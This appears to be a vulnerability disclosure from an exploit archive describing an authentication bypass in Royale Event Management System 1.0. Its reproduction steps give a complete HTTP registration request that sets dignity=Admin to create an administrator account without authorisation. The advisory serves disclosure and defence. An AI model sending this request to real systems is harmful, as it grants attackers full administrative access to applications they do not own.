Royale Event Management System 1.0 Privilege Escalation

Royale Event Management System version 1.0 suffers from a privilege escalation vulnerability by allowing an attacker to register an account as an administrator.


MD5 | 35f13a99bc5c2140a4b831ec8158ec5d

# Exploit Title: Royale Event Management System 1.0 - Authentication Bypass
# Date: 25/03/2022
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
# Version: 1.0
# Tested on: Linux


Title:
================
Royale Event Management System 1.0 - Authentication Bypass


Summary:
================
Royale Event Management System version 1.0 is affected by a vulnerability
that allows an attacker to bypass authentication. Because of the lack of
session validation, the attacker could register a user with administrative
permissions over the application and gain full access to it.


Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L


Affected Product:
================
Royale Event Management System v1.0


Steps to Reproduce:
================

1. Open a request repeater (like Burp Suite) and send this request:

POST /royal_event/userregister.php HTTP/1.1
Host: target.com
Content-Length: 164
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://target.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://target.com/one_church/userregister.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

dignity=Admin&staffid=1000&fullname=<NICKNAME_HERE>&firstname=<FIRST_NAME>&lastname=<LAST_NAME>&mobileno=2520000000&emailid=<YOUR_EMAIL>&password=<YOUR_PASSWORD>&confirmpassword=<YOUR_PASSWORD>&signup=Register

Fill in the parameters with the values according to each one of them and
send the request.

Related Posts